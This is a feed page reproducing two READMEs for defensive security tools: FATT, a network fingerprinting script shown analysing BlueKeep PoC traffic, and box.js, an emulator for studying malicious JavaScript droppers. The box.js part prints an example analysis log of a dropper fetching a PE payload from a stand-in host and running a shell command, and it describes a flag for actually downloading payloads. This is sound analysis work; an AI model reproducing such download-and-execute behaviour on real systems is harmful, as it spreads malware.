FATT is a script for extracting network metadata and fingerprints such as JA3 and HASSH from packet capture files (pcap) or live network traffic. The main use-case is for monitoring honeypots, but you can also use it for other use cases such as network forensic analysis. fatt works on Linux, macOS and Windows.
Note that fatt uses pyshark (a python wrapper for tshark) and therefore the performance is not great! But that's not a big issue as obviously this is not a tool you use in production. You can use other network analysis tools such as Bro/Zeek, Suricata or Netcap for more serious use cases. Joy is another great tool you can use for capturing and analyzing network flow data.
Other than that, I'm working on a go based version of fatt which is faster, and you can use its libraries in your gopacket based tools such as packetbeat. I released the initial version of its gQUIC library (QUICk).

Features
  • Protocol support: SSL/TLS, SSH, RDP, HTTP, gQUIC.
    • To be added soon: IETF QUIC, MySQL, MSSQL, etc.
  • Fingerprinting
    • JA3: TLS client/server fingerprint
    • HASSH: SSH client/server fingerprint
    • RDFP: my experimental RDP fingerprint for standard RDP security protocol (note that other RDP security modes use TLS and can be fingerprinted with JA3)
    • HTTP header fingerprint
    • gQUIC/iQUIC fingerprint will be added soon
  • JSON output

Getting Started
  1. Install tshark
You need to first install tshark. Make sure you have the version v2.9.0 or later. Tshark/Wireshak renamed 'ssl' to 'tls' from version v2.9.0, and fatt is written based on the new version of tshark.
If you have an old version of tshark (< v2.9.0), you can use the fatt script from "old-tshark" branch.
  1. Install dependencies
cd fatt/  pip3 install pipenv  pipenv install  
OR just install pyshark if you don't want to use a virtual environment:
pip3 install pyshark==0.4.2.2  
To activate the virtualenv, run pipenv shell:
$ pipenv shell  Launching subshell in virtual environment…  bash-3.2$  . /Users/adel/.local/share/virtualenvs/fatt-ucJHMzzt/bin/activate  (fatt-ucJHMzzt) bash-3.2$ python3 fatt.py -h  
Alternatively, run the command inside the virtualenv with pipenv run:
$ pipenv run python3 fatt.py -h  
Output:
usage: fatt.py [-h] [-r READ_FILE] [-d READ_DIRECTORY] [-i INTERFACE]                 [-fp [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]]]                 [-da DECODE_AS] [-f BPF_FILTER] [-j] [-o OUTPUT_FILE]                 [-w WRITE_PCAP] [-p]    A python script for extracting network fingerprints    optional arguments:    -h, --help            show this help message and exit    -r READ_FILE, --read_file READ_FILE                          pcap file to process    -d READ_DIRECTORY, --read_directory READ_DIRECTORY                          directory of pcap files to process    -i INTERFACE, --interface INTERFACE                          listen on interface    -fp [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]], --fingerprint [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]]                          protocols to fingerprint. Default: all    -da DECODE_AS, --decode_as DECODE_AS                          a dictionary of {decode_criterion_string:                          decode_as_protocol} that is used to tell tshark to                          decode protocols in situations it wouldn't usually.    -f BPF_FILTER, --bpf_filter BPF_FILTER                          BPF capture filter to use (for live capture only).'    -j, --json_logging    log the output in json format    -o OUTPUT_FILE, --output_file OUTPUT_FILE                          specify the output log file. Default: fatt.log    -w WRITE_PCAP, --write_pcap WRITE_PCAP                          save the live captured packets to this file    -p, --print_output    print the output  

Usage

Live network traffic capture:
$ python3 fatt.py -i en0 --print_output --json_logging  192.168.1.10:59565 -> 192.168.1.3:80 [HTTP] hash=598c34a2838e82f9ec3175305f233b89 userAgent="Spotify/109600181 OSX/0 (MacBookPro14,3)"  192.168.1.10:59566 -> 13.237.44.5:22 [SSH] hassh=ec7378c1a92f5a8dde7e8b7a1ddf33d1 client=SSH-2.0-OpenSSH_7.9  13.237.44.5:22 -> 192.168.1.10:59566 [SSH] hasshS=3f0099d323fed5119bbfcca064478207 server=SSH-2.0-babeld-80573d3e  192.168.1.10:59584 -> 93.184.216.34:443 [TLS] ja3=e6573e91e6eb777c0933c5b8f97f10cd serverName=example.com  93.184.216.34:443 -> 192.168.1.10:59584 [TLS] ja3s=ae53107a2e47ea20c72ac44821a728bf  192.168.1.10:59588 -> 192.168.1.3:80 [HTTP] hash=598c34a2838e82f9ec3175305f233b89 userAgent="Spotify/109600181 OSX/0 (MacBookPro14,3)"  192.168.1.10:59601 -> 216.58.196.142:80 [HTTP] hash=d6662c018cd4169689ddf7c6c0f8ca1b userAgent="curl/7.54.0"  216.58.196.142:80 -> 192.168.1.10:59601 [HTTP] hash=c5241aca9a7c86f06f476592f5dda9a1 server=gws  192.168.1.10:54387 -> 216.58.203.99:443 [QUIC] UAID="Chrome/74.0.3729.169 Intel Mac OS X 10_14_5" SNI=clientservices.googleapis.com AEAD=AESG KEXS=C255  
JSON output:
$ cat fatt.log  {"timestamp": "2019-05-28T03:41:25.415086", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.3", "sourcePort": "59565", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/DIAL/apps/com.spotify.Spotify.TVv2", "requestFullURI": "http://192.168.1.3/DIAL/apps/com.spotify.Spotify.TVv2", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "Spotify/109600181 OSX/0 (MacBookPro14,3)", "clientHeaderOrder": "connection,accept_encoding,host,user_agent", "clientHeaderHash": "598c34a2838e82f9ec3175305f233b89"}}  {"timestamp": "2019-05-28T03:41:26.099574", "sourceIp": "13.237.44.5", "destinationIp": "192.168.1.10", "sourcePort": "22", "destinationPort": "59566", "protocol": "ssh", "ssh": {"server": "SSH-2.0-babeld-80573d3e", "hasshServer": "3f0099d323fed5119bbfcca064478207", "hasshServerAlgorithms": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib,zlib@openssh.com", "hasshVersion": "1.0", "skex": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256", "seastc": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-   ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc", "smastc": "hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "scastc": "none,zlib,zlib@openssh.com", "slcts": "[Empty]", "slstc": "[Empty]", "seacts": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc", "smacts": "hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "scacts": "none,zlib,zlib@openssh.com", "sshka": "ssh-dss,rsa-sha2-512,rsa-sha2-256,ssh-rsa"}}  {"timestamp": "2019-05-28T03:41:26.106737", "sourceIp": "192.168.1.10", "destinationIp": "13.237.44.5", "sourcePort": "59566", "destinationPort": "22", "protocol": "ssh", "ssh": {"client": "SSH-2.0-OpenSSH_7.9", "hassh": "ec7378c1a92f5a8dde7e8b7a1ddf33d1", "hasshAlgorithms": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib", "hasshVersion": "1.0", "ckex": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,e   cdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c", "ceacts": "chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com", "cmacts": "umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "ccacts": "none,zlib@openssh.com,zlib", "clcts": "[Empty]", "clstc": "[Empty]", "ceastc": "chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com", "cmastc": "umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "ccastc": "non   e,zlib@openssh.com,zlib", "cshka": "rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519"}}  {"timestamp": "2019-05-28T03:41:36.762811", "sourceIp": "192.168.1.10", "destinationIp": "93.184.216.34", "sourcePort": "59584", "destinationPort": "443", "protocol": "tls", "tls": {"serverName": "example.com", "ja3": "e6573e91e6eb777c0933c5b8f97f10cd", "ja3Algorithms": "771,49200-49196-49192-49188-49172-49162-159-107-57-52393-52392-52394-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49170-49160-22-10-255,0-11-10-13-16,29-23-24,0", "ja3Version": "771", "ja3Ciphers": "49200-49196-49192-49188-49172-49162-159-107-57-52393-52392-52394-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49170-49160-22-10-255", "ja3Extensions": "0-11-10-13-16", "ja3Ec": "29-23-24", "ja3EcFmt": "0"}}  {"timestamp": "2019-05-28T03:41:36.920935", "sourceIp": "93.184.216.34", "destinationIp": "192.168.1.10", "sourcePort": "443", "destinationPort": "59584", "protocol": "tls", "tls": {"ja3s": "ae53107a2e47ea20c72ac44821a728bf", "ja3sAlgorithms": "771,49199,65281-0-11-16", "ja3sVersion": "771", "ja3sCiphers": "49199", "ja3sExtensions": "65281-0-11-16"}}  {"timestamp": "2019-05-28T03:41:37.487609", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.3", "sourcePort": "59588", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/DIAL/apps/com.spotify.Spotify.TVv2", "requestFullURI": "http://192.168.1.3/DIAL/apps/com.spotify.Spotify.TVv2", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "Spotify/109600181 OSX/0 (MacBookPro14,3)", "clientHeaderOrder": "connection,accept_encoding,host,user_agent", "clientHeaderHash": "598c34a2838e82f9ec3175305f233b89"}}  {"timestamp": "2019-05-28T03:41:48.700730", "sourceIp": "192.168.1.10", "destinationIp": "216.58.196.142", "sourcePort": "59601", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/", "requestFullURI": "http://google.com/", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "curl/7.54.0", "clientHeaderOrder": "host,user_agent,accept", "clientHeaderHash": "d6662c018cd4169689ddf7c6c0f8ca1b"}}  {"timestamp": "2019-05-28T03:41:48.805393", "sourceIp": "216.58.196.142", "destinationIp": "192.168.1.10", "sourcePort": "80", "destinationPort": "59601", "protocol": "http", "http": {"server": "gws", "serverHeaderOrder": "location,content_type,date,cache_control,server,content_length", "serverHeaderHash": "c5241aca9a7c86f06f476592f5dda9a1"}}  {"timestamp": "2019-05-28T03:41:58.038530", "sourceIp": "192.168.1.10", "destinationIp": "216.58.203.99", "sourcePort": "54387", "destinationPort": "443", "protocol": "gquic", "gquic": {"tagNumber": "25", "sni": "clientservices.googleapis.com", "uaid": "Chrome/74.0.3729.169 Intel Mac OS X 10_14_5", "ver": "Q043", "aead": "AESG", "smhl": "1", "mids": "100", "kexs": "C255", "xlct": "cd9baccc808a6d3b", "copt": "NSTP", "ccrt": "cd9baccc808a6d3b67f8adc58015e3ff", "stk": "d6a64aeb563a19fe091bc34e8c038b0a3a884c5db7caae071180c5b739bca3dd7c42e861386718982fbe6db9d1cb136f799e8d10fd5a", "pdmd": "X509", "ccs": "01e8816092921ae8", "scid": "376976b980c73b669fea57104fb725c6"}}  

Packet capture file (pcap):
Let's have a look at the captured traffic of Metasploit auxiliary scanner for the recent CVE-2019-0708 RDP vulnerability (BlueKeep).
cd fatt/
pip3 install pipenv
pipenv install
Let's test it with another CVE-2019-0708 PoC:
$ python3 fatt.py -r RDP/cve-2019-0708_poc.pcap -p -j; cat fatt.log | python -m json.tool  192.168.1.10:54303 -> 192.168.1.20:3389 [RDP] req_protocols=0x00000001    {      "destinationIp": "192.168.1.20",      "destinationPort": "3389",      "protocol": "rdp",      "rdp": {          "requestedProtocols": "0x00000001"      },      "sourceIp": "192.168.1.10",      "sourcePort": "54303",      "timestamp": "2019-05-23T18:41:42.572758"  }  
This time we don't see the RDP ClientInfo message because the PoC uses TLS (not the standard RDP security protocol). So we can just see the Negotiation Request messages, but if you decode the packet as TLS, you can see the TLS clientHello and JA3 fingerprint. Here's how you can decode a specific port as another protocol:
$ python3 fatt.py -r RDP//cve-2019-0708_poc.pcap -p -j --decode_as '{"tcp.port==3389": "tls"}'  192.168.1.10:50026 -> 192.168.1.20:3389 [TLS] ja3=67e3d18fd9dddbbc8eca65f7dedac674 serverName=192.168.1.20  192.168.1.20:3389 -> 192.168.1.10:50026 [TLS] ja3s=649d6810e8392f63dc311eecb6b7098b    $ cat fatt.log  {"timestamp": "2019-05-23T17:21:56.056200", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.20", "sourcePort": "50026", "destinationPort": "3389", "protocol": "tls", "tls": {"serverName": "192.168.1.20", "ja3": "67e3d18fd9dddbbc8eca65f7dedac674", "ja3Algorithms": "771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-57-51-157-156-61-60-53-47-10-106-64-56-50-19-5-4,0-5-10-11-13-35-23-65281,29-23-24,0", "ja3Version": "771", "ja3Ciphers": "49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-57-51-157-156-61-60-53-47-10-106-64-56-50-19-5-4", "ja3Extensions": "0-5-10-11-13-35-23-65281", "ja3Ec": "29-23-24", "ja3EcFmt": "0"}}  {"timestamp": "2019-05-23T17:21:56.059333", "sourceIp": "192.168.1.20", "destinationIp": "192.168.1.10", "sourcePort": "3389", "destinationPort": "50026", "protocol": "tls", "tls": {"ja3s": "649d6810e8392f63dc311eecb6b7098b", "ja3sAlgorithms": "771,49192,23-65281", "ja3sVersion": "771", "ja3sCiphers": "49192", "ja3sExtensions": "23-65281"}}  


box.js - A Tool For Studying JavaScript Malware

$
0
0

A utility to analyze malicious JavaScript.

Installation
Simply install box-js from npm:
npm install box-js --global

Usage
Looking to use box-js with Cuckoo? Use cuckoo-package.py as an analysis package.
Let's say you have a sample called sample.js: to analyze it, simply run
box-js sample.js
Chances are you will also want to download any payloads; use the flag --download to enable downloading. Otherwise, the engine will simulate a 404 error, so that the script will be tricked into thinking the distribution site is down and contacting any fallback sites.
Box.js will emulate a Windows JScript environment, print a summary of the emulation to the console, and create a folder called sample.js.results (if it already exists, it will create sample.js.1.results and so on). This folder will contain:
  • analysis.log, a log of the analysis as it was printed on screen;
  • a series of files identified by UUIDs;
  • snippets.json, a list of pieces of code executed by the sample (JavaScript, shell commands, etc.);
  • urls.json, a list of URLs contacted;
  • active_urls.json, a list of URLs that seem to drop active malware;
  • resources.json, the ADODB streams (i.e. the files that the script wrote to disk) with file types and hashes;
  • IOC.json, a list of behaviours identified as IOCs (Indicators of Compromise). These include registry accesses, written files, HTTP requests and so on.
You can analyze these by yourself, or you can automatically submit them to Malwr, VirusTotal or a Cuckoo sandbox: for more information, run box-export --help.
For further isolation, it is recommended to run the analysis in a temporary Docker container. Consult integrations/README.md for more information.
If you wish to automate the analysis, you can use the return codes - documented in integrations/README.md - to distinguish between different types of errors.

Batch usage
While box.js is typically used on single files, it can also run batch analyses. You can simply pass a list of files or folders to analyse:
box-js sample1.js sample2.js /var/data/mySamples ...
By default box.js will process samples in parallel, running one analysis per core. You can use a different setting by specifying a value for --threads: in particular, 0 will remove the limit, making box-js spawn as many analysis threads as possible and resulting in very fast analysis but possibly overloading the system (note that analyses are usually CPU-bound, not RAM-bound).
You can use --loglevel=warn to silence analysis-related messages and only display progress info.
After the analysis is finished, you can extract the active URLs like this:
cat ./*.results/active_urls.json | sort | uniq

Flags
NAME                   DESCRIPTION                                                                     
-h, --help Show the help text and quit
-v, --version Show the package version and quit
--license Show the license and quit
--debug Die when an emulation error occurs, even in "batch mode", and pass on the exit
code.
--loglevel Logging level (debug, verbose, info, warning, error - default "info")
--threads When running in batch mode, how many analyses to run at the same time (0 =
unlimited, default: as many as the number of CPU cores)
--download Actually download the payloads
--encoding Encoding of the input sample (will be automatically detected by default)
--timeout The script will timeout after this many seconds (default 10)
--output-dir The location on disk to write the results files and folders to (defaults to the
current directory)
--preprocess Preprocess the original source code (makes reverse engineering easier, but takes
a few seconds)
--unsafe-preprocess More aggressive preprocessing. Often results in better code, but can break on
some ed ge cases (eg. redefining prototypes)
--no-kill Do not kill the application when runtime errors occur
--no-echo When the script prints data, do not print it to the console
--no-rewrite Do not rewrite the source code at all, other than for `@cc_on` support
--no-catch-rewrite Do not rewrite try..catch clauses to make the exception global-scoped
--no-cc_on-rewrite Do not rewrite `/*@cc_on <...>@*/` to `<...>`
--no-eval-rewrite Do not rewrite `eval` so that its argument is rewritten
--no-file-exists Return `false` for Scripting.FileSystemObject.FileExists(x)
--no-folder-exists Return `false` for Scripting.FileSystemObject.FileExists(x)
--function-rewrite Rewrite function cal ls in order to catch eval calls
--no-rewrite-prototype Do not rewrite expressions like `function A.prototype.B()` as `A.prototype.B =
function()`
--no-hoist-prototype Do not hoist expressions like `function A.prototype.B()` (implied by
no-rewrite-prototype)
--no-shell-error Do not throw a fake error when executing `WScriptShell.Run` (it throws a fake
error by default to pretend that the distribution sites are down, so that the
script will attempt to poll every site)
--no-typeof-rewrite Do not rewrite `typeof` (e.g. `typeof ActiveXObject`, which must return
'unknown' in the JScript standard and not 'ob ject')
--proxy [experimental] Use the specified proxy for downloads. This is not relevant if
the --download flag is not present.
--windows-xp Emulate Windows XP (influences the value of environment variables)
--dangerous-vm Use the `vm` module, rather than `vm2`. This sandbox can be broken, so **don't
use this** unless you're 100% sure of what you're doing. Helps with debugging by
giving correct stack traces.

Analyzing the output

Console output
The first source of information is the console output. On a succesful analysis, it will typically print something like this:
Using a 10 seconds timeout, pass --timeout to specify another timeout in seconds
Analyzing sample.js
Header set for http://foo.bar/baz: User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Emulating a GET request to http://foo.bar/baz
Downloaded 301054 bytes.
Saved sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a (301054 bytes)
sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a has been detected as data.
Saved sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 (303128 bytes)
sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 has been detected as PE32 executable (GUI) Intel 80386, for MS Windows.
http://foo.bar/baz is an active URL.
Executing sample.js.results/d241e130-346f-4c0c-a698-f925dbd68f0c in the WScript shell
Header set for http://somethingelse.com/: User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Emulating a GET request to http://somethingelse.com/
...
In this case, we are seeing a dropper that downloads a file from http://foo.bar/baz, setting the HTTP header User-Agent to Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0). Then, it proceeds to decode it, and write the result to disk (a PE32 executable). Finally, it runs some command in the Windows shell.
  • sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a will contain the payload as it was downloaded from http://foo.bar/baz;
  • sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 will contain the actual payload (PE executable);
  • sample.js.results/d241e130-346f-4c0c-a698-f925dbd68f0c will contain the command that was run in the Windows shell.

JSON logs
Every HTTP request is both printed on the terminal and logged in urls.json. Duplicate URLs aren't inserted (i.e. requesting the same URL twice will result in only one line in urls.json).
active_urls.json contains the list of URLs that eventually resulted in an executable payload. This file is the most interesting, if you're looking to take down distribution sites.
snippets.json contains every piece of code that box-js came across, either JavaScript, a cmd.exe command or a PowerShell script.
resources.json contains every file written to disk by the sample. For instance, if the application tried to save Hello world! to $PATH/foo.txt, the content of resources.json would be:
{
"9a24...": {
"path": "(path)\\foo.txt",
"type": "ASCII text, with no line terminators",
"md5": "86fb269d190d2c85f6e0468ceca42a20",
"sha1": "d3486ae9136e7856bc42212385ea797094475802",
"sha256": "c0535e4be2b79ffd93291305436bf889314e4a3faec05ecffcbb7df31ad9e51a"
}
}
The resources.json file is also important: watch out for any executable resource (eg. with "type": "PE32 executable (GUI) Intel 80386, for MS Windows").

Patching
Some scripts in the wild have been observed to use new Date().getYear() where new Date().getFullYear(). If a sample isn't showing any suspicious behaviour, watch out for Date checks.

If you run into .JSE files, compile the decoder and run it like this:
cc decoder.c -o decoder
./decoder foo.jse bar.js
node run bar.js

Expanding
You may occasionally run into unsupported components. In this case, you can file an issue on GitHub, or emulate the component yourself if you know JavaScript.
The error will typically look like this (line numbers may be different):
1 Jan 00:00:00 - Unknown ActiveXObject WinHttp.WinHttpRequest.5.1
Trace
at kill (/home/CapacitorSet/box-js/run.js:24:10)
at Proxy.ActiveXObject (/home/CapacitorSet/box-js/run.js:75:4)
at evalmachine.<anonymous>:1:6471
at ContextifyScript.Script.runInNewContext (vm.js:18:15)
at ...
You can see that the exception was raised in Proxy.ActiveXObject, which looks like this:
function ActiveXObject(name) {
name = name.toLowerCase();
/* ... */
switch (name) {
case "wscript.shell":
return require("./emulator/WScriptShell");
/* ... */
default:
kill(`Unknown ActiveXObject ${name}`);
break;
}
}
Add a new case "winhttp.winhttprequest.5.1" (note the lowercase!), and have it return an ES6 Proxy object (eg. ProxiedWinHttpRequest). This is used to catch unimplemented features as soon as they're requested by the malicious sample:
/* emulator/WinHttpRequest.exe */
const lib = require("../lib");

module.exports = function ProxiedWinHttpRequest() {
return new Proxy(new WinHttpRequest(), {
get: function(target, name, receiver) {
switch (name) {
/* Add here "special" traps with case statements */
default:
if (name in target) return target[name];
else lib.kill(`WinHttpRequest.${name} not implemented!`)
}
}
})
}

function WinHttpRequest() {

}
Rerun the analysis: it will fail again, telling you what exactly was not implemented.
1 Jan 00:00:00 - WinHttpRequest.open not implemented!
Trace
at kill (/home/CapacitorSet/box-js/run.js:24:10)
at Object.ProxiedWinHttpRequest.Proxy.get (/home/CapacitorSet/box-js/run.js:89:7)
Emulate WinHttpRequest.open as needed:
function WinHttpRequest() {
this.open = function(method, url) {
URLLogger(method, url);
this.url = url;
}
}
and iterate until the code emulates without errors.

Contributors
@CapacitorSet: Main developer
@daviesjamie:
  • npm packaging
  • command-line help
  • --output-directory
  • bugfixes
@ALange:
  • support for non-UTF8 encodings
  • bug reporting
@alexlamsl, @kzc
  • advice on integrating UglifyJS in box-js
  • improving the features of UglifyJS used in deobfuscation
@psrok:
  • bugfixes
@gaelmuller:
  • bugfixes


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>